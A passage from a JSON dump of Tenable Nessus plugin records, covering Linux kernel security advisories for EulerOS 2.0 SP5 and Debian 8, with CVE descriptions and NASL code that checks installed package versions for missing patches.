CID-728c1e2a05e4.(CVE-2019-19074)Memory leaks in driverset/wireless/ath/ath9k/htc_hst.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering wait_for_completion_timeout() failures. This affects the htc_config_pipe_credits() function, the htc_setup_complete() function, and the htc_connect_service() function, aka CID-853acf7caf10.(CVE-2019-19073)Two memory leaks in the rtl_usb_probe() function in driverset/wireless/realtek/rtlwifi/usb.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption), aka CID-3f9361695113.(CVE-2019-19063)A memory leak in the mwifiex_pcie_alloc_cmdrsp_buf() function in driverset/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in the mwifiex_pcie_init_evt_ring() function in driverset/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-d10dcb615c8e.(CVE-2019-19057)An issue was discovered in the Linux kernel through 5.2.9. There is a NULL pointer dereference caused by a malicious USB device in the flexcop_usb_probe function in the drivers/media/usb/b2c2/flexcop-usb.c driver.(CVE-2019-15291)A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID:\n A-141720095(CVE-2019-2215)In task_get_unused_fd_flags of binder.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android kernel Android ID: A-69164715 References: Upstream kernel.(CVE-2018-9465)In the Android kernel in Pixel C USB monitor driver there is a possible OOB write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.(CVE-2019-9456)fs/btrfs/volumes.c in the Linux kernel before 5.1 allows a btrfs_verify_dev_extents NULL pointer dereference via a crafted btrfs image because fs_devices->devices is mishandled within find_device, aka CID-09ba3bc9dd15.(CVE-2019-18885)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-12-23T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP5 : kernel (EulerOS-SA-2019-2693)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1350", "CVE-2017-12134", "CVE-2018-1129", "CVE-2018-9465", "CVE-2019-10220", "CVE-2019-15291", "CVE-2019-17351", "CVE-2019-18675", "CVE-2019-18885", "CVE-2019-19051", "CVE-2019-19056", "CVE-2019-19057", "CVE-2019-19058", "CVE-2019-19063", "CVE-2019-19065", "CVE-2019-19067", "CVE-2019-19073", "CVE-2019-19074", "CVE-2019-19523", "CVE-2019-19524", "CVE-2019-19527", "CVE-2019-19528", "CVE-2019-19530", "CVE-2019-19531", "CVE-2019-19532", "CVE-2019-19533", "CVE-2019-19537", "CVE-2019-2215", "CVE-2019-9456"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2019-2693.NASL", "href": "https://www.tenable.com/plugins/nessus/132360", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132360);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-1350\",\n \"CVE-2017-12134\",\n \"CVE-2018-1129\",\n \"CVE-2018-9465\",\n \"CVE-2019-10220\",\n \"CVE-2019-15291\",\n \"CVE-2019-17351\",\n \"CVE-2019-18675\",\n \"CVE-2019-18885\",\n \"CVE-2019-19051\",\n \"CVE-2019-19056\",\n \"CVE-2019-19057\",\n \"CVE-2019-19058\",\n \"CVE-2019-19063\",\n \"CVE-2019-19065\",\n \"CVE-2019-19067\",\n \"CVE-2019-19073\",\n \"CVE-2019-19074\",\n \"CVE-2019-19523\",\n \"CVE-2019-19524\",\n \"CVE-2019-19527\",\n \"CVE-2019-19528\",\n \"CVE-2019-19530\",\n \"CVE-2019-19531\",\n \"CVE-2019-19532\",\n \"CVE-2019-19533\",\n \"CVE-2019-19537\",\n \"CVE-2019-2215\",\n \"CVE-2019-9456\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"EulerOS 2.0 SP5 : kernel (EulerOS-SA-2019-2693)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):Linux kernel CIFS\n implementation, version 4.9.0 is vulnerable to a\n relative paths injection in directory entry\n lists.(CVE-2019-10220)A memory leak in the\n i2400m_op_rfkill_sw_toggle() function in drivers/\n net/wimax/i2400m/op-rfkill.c in the Linux kernel before\n 5.3.11 allows attackers to cause a denial of service\n (memory consumption), aka\n CID-6f3ef5c25cc7.(CVE-2019-19051)A memory leak in the\n sdma_init() function in\n drivers/infiniband/hw/hfi1/sdma.c in the Linux kernel\n before 5.3.9 allows attackers to cause a denial of\n service (memory consumption) by triggering\n rhashtable_init() failures, aka\n CID-34b3be18a04e.(CVE-2019-19065)Four memory leaks in\n the acp_hw_init() function in\n drivers/gpu/drm/amd/amdgpu/amdgpu_acp.c in the Linux\n kernel before 5.3.8 allow attackers to cause a denial\n of service (memory consumption) by triggering\n mfd_add_hotplug_devices() or pm_genpd_add_device()\n failures, aka CID-57be09c6e874. NOTE: third parties\n dispute the relevance of this because the attacker must\n already have privileges for module\n loading.(CVE-2019-19067)An issue was discovered in\n drivers/xen/balloon.c in the Linux kernel before 5.2.3,\n as used in Xen through 4.12.x, allowing guest OS users\n to cause a denial of service because of unrestricted\n resource consumption during the mapping of guest\n memory, aka CID-6ef36ab967c7.(CVE-2019-17351)The\n xen_biovec_phys_mergeable function in\n drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability\n calculation.(CVE-2017-12134)In the Linux kernel before\n 5.3.7, there is a use-after-free bug that can be caused\n by a malicious USB device in the\n drivers/usb/misc/adutux.c driver, aka\n CID-44efc269db79.(CVE-2019-19523)In the Linux kernel\n before 5.3.7, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/iowarrior.c driver, aka\n CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/usb/class/cdc-acm.c driver, aka\n CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel\n before 5.3.4, there is an info-leak bug that can be\n caused by a malicious USB device in the\n drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka\n CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel\n before 5.2.10, there is a race condition bug that can\n be caused by a malicious USB device in the USB\n character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)In\n the Linux kernel before 5.3.12, there is a\n use-after-free bug that can be caused by a malicious\n USB device in the drivers/input/ff-memless.c driver,\n aka CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux\n kernel before 5.2.10, there is a use-after-free bug\n that can be caused by a malicious USB device in the\n drivers/hid/usbhid/hiddev.c driver, aka\n CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel\n before 5.3.9, there are multiple out-of-bounds write\n bugs that can be caused by a malicious USB device in\n the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c,\n drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c,\n drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c,\n drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c,\n drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c,\n drivers/hid/hid-tmff.c, and\n drivers/hid/hid-zpff.c.(CVE-2019-19532)The VFS\n subsystem in the Linux kernel 3.x provides an\n incomplete set of requirements for setattr operations\n that underspecifies removing extended privilege\n attributes, which allows local users to cause a denial\n of service (capability stripping) via a failed\n invocation of a system call, as demonstrated by using\n chown to remove a capability from the ping or Wireshark\n dumpcap program.(CVE-2015-1350)In the Linux kernel\n before 5.2.9, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/yurex.c driver, aka\n CID-fc05481b2fca.(CVE-2019-19531)The Linux kernel\n through 5.3.13 has a start_offset+size Integer Overflow\n in cpia2_remap_buffer in\n drivers/media/usb/cpia2/cpia2_core.c because cpia2 has\n its own mmap implementation. This allows local users\n (with /dev/video0 access) to obtain read and write\n permissions on kernel physical pages, which can\n possibly result in a privilege\n escalation.(CVE-2019-18675)A flaw was found in the way\n signature calculation was handled by cephx\n authentication protocol. An attacker having access to\n ceph cluster network who is able to alter the message\n payload was able to bypass signature checks done by\n cephx protocol. Ceph branches master, mimic, luminous\n and jewel are believed to be\n vulnerable.(CVE-2018-1129)A memory leak in the\n alloc_sgtable() function in\n driverset/wireless/intel/iwlwifi/fw/dbg.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n alloc_page() failures, aka\n CID-b4b814fec1a5.(CVE-2019-19058)A memory leak in the\n ath9k_wmi_cmd() function in\n driverset/wireless/ath/ath9k/wmi.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-728c1e2a05e4.(CVE-2019-19074)Memory leaks in\n driverset/wireless/ath/ath9k/htc_hst.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n wait_for_completion_timeout() failures. This affects\n the htc_config_pipe_credits() function, the\n htc_setup_complete() function, and the\n htc_connect_service() function, aka\n CID-853acf7caf10.(CVE-2019-19073)Two memory leaks in\n the rtl_usb_probe() function in\n driverset/wireless/realtek/rtlwifi/usb.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption), aka\n CID-3f9361695113.(CVE-2019-19063)A memory leak in the\n mwifiex_pcie_alloc_cmdrsp_buf() function in\n driverset/wireless/marvell/mwifiex/pcie.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in\n the mwifiex_pcie_init_evt_ring() function in\n driverset/wireless/marvell/mwifiex/pcie.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-d10dcb615c8e.(CVE-2019-19057)An issue was\n discovered in the Linux kernel through 5.2.9. There is\n a NULL pointer dereference caused by a malicious USB\n device in the flexcop_usb_probe function in the\n drivers/media/usb/b2c2/flexcop-usb.c\n driver.(CVE-2019-15291)A use-after-free in binder.c\n allows an elevation of privilege from an application to\n the Linux Kernel. No user interaction is required to\n exploit this vulnerability, however exploitation does\n require either the installation of a malicious local\n application or a separate vulnerability in a network\n facing application.Product: AndroidAndroid ID:\n A-141720095(CVE-2019-2215)In task_get_unused_fd_flags\n of binder.c, there is a possible memory corruption due\n to a use after free. This could lead to local\n escalation of privilege with no additional execution\n privileges needed. User interaction is not needed for\n exploitation. Product: Android Versions: Android kernel\n Android ID: A-69164715 References: Upstream\n kernel.(CVE-2018-9465)In the Android kernel in Pixel C\n USB monitor driver there is a possible OOB write due to\n a missing bounds check. This could lead to local\n escalation of privilege with System execution\n privileges needed. User interaction is not needed for\n exploitation.(CVE-2019-9456)fs/btrfs/volumes.c in the\n Linux kernel before 5.1 allows a\n btrfs_verify_dev_extents NULL pointer dereference via a\n crafted btrfs image because fs_devices->devices is\n mishandled within find_device, aka\n CID-09ba3bc9dd15.(CVE-2019-18885)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5cacf951\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10220\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.5.h359.eulerosv2r7\",\n \"kernel-devel-3.10.0-862.14.1.5.h359.eulerosv2r7\",\n \"kernel-headers-3.10.0-862.14.1.5.h359.eulerosv2r7\",\n \"kernel-tools-3.10.0-862.14.1.5.h359.eulerosv2r7\",\n \"kernel-tools-libs-3.10.0-862.14.1.5.h359.eulerosv2r7\",\n \"perf-3.10.0-862.14.1.5.h359.eulerosv2r7\",\n \"python-perf-3.10.0-862.14.1.5.h359.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:55:37", "description": "Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service, or information leak.\n\nCVE-2019-2215\n\nThe syzkaller tool discovered a use-after-free vulnerability in the Android binder driver. A local user on a system with this driver enabled could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation. However, this driver is not enabled on Debian packaged kernels.\n\nCVE-2019-10220\n\nVarious developers and researchers found that if a crafted file- system or malicious file server presented a directory with filenames including a '/' character, this could confuse and possibly defeat security checks in applications that read the directory.\n\nThe kernel will now return an error when reading such a directory, rather than passing the invalid filenames on to user-space.\n\nCVE-2019-14895, CVE-2019-14901\n\nADLab of Venustech discovered potential heap buffer overflows in the mwifiex wifi driver. On systems using this driver, a malicious Wireless Access Point or adhoc/P2P peer could use these to cause a denial of service (memory corruption or crash) or possibly for remote code execution.\n\nCVE-2019-14896, CVE-2019-14897\n\nADLab of Venustech discovered potential heap and stack buffer overflows in the libertas wifi driver. On systems using this driver, a malicious Wireless Access Point or adhoc/P2P peer could use these to cause a denial of service (memory corruption or crash) or possibly for remote code execution.\n\nCVE-2019-15098\n\nHui Peng and Mathias Payer reported that the ath6kl wifi driver did not properly validate USB descriptors, which could lead to a NULL pointer derefernce. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15217\n\nThe syzkaller tool discovered that the zr364xx mdia driver did not correctly handle devices without a product name string, which could lead to a NULL pointer dereference. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15291\n\nThe syzkaller tool discovered that the b2c2-flexcop-usb media driver did not properly validate USB descriptors, which could lead to a NULL pointer dereference. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-15505\n\nThe syzkaller tool discovered that the technisat-usb2 media driver did not properly validate incoming IR packets, which could lead to a heap buffer over-read. An attacker able to add USB devices could use this to cause a denial of service (BUG/oops) or to read sensitive information from kernel memory.\n\nCVE-2019-16746\n\nIt was discovered that the wifi stack did not validate the content of beacon heads provided by user-space for use on a wifi interface in Access Point mode, which could lead to a heap buffer overflow. A local user permitted to configure a wifi interface could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-17052, CVE-2019-17053, CVE-2019-17054, CVE-2019-17055, CVE-2019-17056\n\nOri Nimron reported that various network protocol implementations\n\n - AX.25, IEEE 802.15.4, Appletalk, ISDN, and NFC - allowed all users to create raw sockets. A local user could use this to send arbitrary packets on networks using those protocols.\n\nCVE-2019-17133\n\nNicholas Waisman reported that the wifi stack did not valdiate received SSID information before copying it, which could lead to a buffer overflow if it is not validated by the driver or firmware. A malicious Wireless Access Point might be able to use this to cause a denial of service (memory corruption or crash) or for remote code execution.\n\nCVE-2019-17666\n\nNicholas Waisman reported that the rtlwifi wifi drivers did not properly validate received P2P information, leading to a buffer overflow. A malicious P2P peer could use this to cause a denial of service (memory corruption or crash) or for remote code execution.\n\nCVE-2019-19051\n\nNavid Emamdoost discovered a potential memory leak in the i2400m wimax driver if the software rfkill operation fails. The security impact of this is unclear.\n\nCVE-2019-19052\n\nNavid Emamdoost discovered a potential memory leak in the gs_usb CAN driver if the open (interface-up) operation fails. The security impact of this is unclear.\n\nCVE-2019-19056, CVE-2019-19057\n\nNavid Emamdoost discovered potential memory leaks in the mwifiex wifi driver if the probe operation fails. The security impact of this is unclear.\n\nCVE-2019-19062\n\nNavid Emamdoost discovered a potential memory leak in the AF_ALG subsystem if the CRYPTO_MSG_GETALG operation fails. A local user could possibly use this to cause a denial of service (memory exhaustion).\n\nCVE-2019-19066\n\nNavid Emamdoost discovered a potential memory leak in the bfa SCSI driver if the get_fc_host_stats operation fails. The security impact of this is unclear.\n\nCVE-2019-19227\n\nDan Carpenter reported missing error checks in the Appletalk protocol implementation that could lead to a NULL pointer dereference. The security impact of this is unclear.\n\nCVE-2019-19332\n\nThe syzkaller tool discovered a missing bounds check in the KVM implementation for x86, which could lead to a heap buffer overflow. A local user permitted to use KVM could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19523\n\nThe syzkaller tool discovered a use-after-free bug in the adutux USB driver. An attacker able to add and remove USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19524\n\nThe syzkaller tool discovered a race condition in the ff-memless library used by input drivers. An attacker able to add and remove USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19527\n\nThe syzkaller tool discovered that the hiddev driver did not correctly handle races between a task opening the device and disconnection of the underlying hardware. A local user permitted to access hiddev devices, and able to add and remove USB devices, could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19530\n\nThe syzkaller tool discovered a potential use-after-free in the cdc-acm network driver. An attacker able to add USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19531\n\nThe syzkaller tool discovered a use-after-free bug in the yurex USB driver. An attacker able to add and remove USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19532\n\nThe syzkaller tool discovered a potential heap buffer overflow in the hid-gaff input driver, which was also found to exist in many other input drivers. An attacker able to add USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19533\n\nThe syzkaller tool discovered that the ttusb-dec media driver was missing initialisation of a structure, which could leak sensitive information from kernel memory.\n\nCVE-2019-19534, CVE-2019-19536\n\nThe syzkaller tool discovered that the peak_usb CAN driver was missing initialisation of some structures, which could leak sensitive information from kernel memory.\n\nCVE-2019-19537\n\nThe syzkaller tool discovered race conditions in the USB stack, involving character device registration. An attacker able to add USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19767\n\nThe syzkaller tool discovered that crafted ext4 volumes could trigger a buffer overflow in the ext4 filesystem driver. An attacker able to mount such a volume could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nCVE-2019-19922\n\nIt was discovered that a change in Linux 3.16.61, 'sched/fair: Fix bandwidth timer clock drift condition', could lead to tasks being throttled before using their full quota of CPU time. A local user could use this bug to slow down other users' tasks. This change has been reverted.\n\nCVE-2019-19947\n\nIt was discovered that the kvaser_usb CAN driver was missing initialisation of some structures, which could leak sensitive information from kernel memory.\n\nCVE-2019-19965\n\nGao Chuan reported a race condition in the libsas library used by SCSI host drivers, which could lead to a NULL pointer dereference. An attacker able to add and remove SCSI devices could use this to cause a denial of service (BUG/oops).\n\nCVE-2019-19966\n\nThe syzkaller tool discovered a missing error check in the cpia2 media driver, which could lead to a use-after-free. An attacker able to add USB devices could use this to cause a denial of service (memory corruption or crash) or possibly for privilege escalation.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 3.16.81-1.\n\nWe recommend that you upgrade your linux packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-01-21T00:00:00", "type": "nessus", "title": "Debian DLA-2068-1 : linux security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10220", "CVE-2019-14895", "CVE-2019-14896", "CVE-2019-14897", "CVE-2019-14901", "CVE-2019-15098", "CVE-2019-15217", "CVE-2019-15291", "CVE-2019-15505", "CVE-2019-16746", "CVE-2019-17052", "CVE-2019-17053", "CVE-2019-17054", "CVE-2019-17055", "CVE-2019-17056", "CVE-2019-17133", "CVE-2019-17666", "CVE-2019-19051", "CVE-2019-19052", "CVE-2019-19056", "CVE-2019-19057", "CVE-2019-19062", "CVE-2019-19066", "CVE-2019-19227", "CVE-2019-19332", "CVE-2019-19523", "CVE-2019-19524", "CVE-2019-19527", "CVE-2019-19530", "CVE-2019-19531", "CVE-2019-19532", "CVE-2019-19533", "CVE-2019-19534", "CVE-2019-19536", "CVE-2019-19537", "CVE-2019-19767", "CVE-2019-19922", "CVE-2019-19947", "CVE-2019-19965", "CVE-2019-19966", "CVE-2019-2215"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-arm", "p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.8-x86", "p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-x86", "p-cpe:/a:debian:debian_linux:linux-doc-3.16", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-586", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-686-pae", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armel", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-armhf", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-all-i386", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-common", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-ixp4xx", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-kirkwood", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-orion5x", "p-cpe:/a:debian:debian_linux:linux-headers-3.16.0-9-versatile", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-586", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-ixp4xx", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-kirkwood", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-orion5x", "p-cpe:/a:debian:debian_linux:linux-image-3.16.0-9-versatile", "p-cpe:/a:debian:debian_linux:linux-libc-dev", "p-cpe:/a:debian:debian_linux:linux-manual-3.16", "p-cpe:/a:debian:debian_linux:linux-source-3.16", "p-cpe:/a:debian:debian_linux:linux-support-3.16.0-9", "p-cpe:/a:debian:debian_linux:xen-linux-system-3.16.0-9-amd64", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-2068.NASL", "href": "https://www.tenable.com/plugins/nessus/133101", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2068-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133101);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2019-10220\", \"CVE-2019-14895\", \"CVE-2019-14896\", \"CVE-2019-14897\", \"CVE-2019-14901\", \"CVE-2019-15098\", \"CVE-2019-15217\", \"CVE-2019-15291\", \"CVE-2019-15505\", \"CVE-2019-16746\", \"CVE-2019-17052\", \"CVE-2019-17053\", \"CVE-2019-17054\", \"CVE-2019-17055\", \"CVE-2019-17056\", 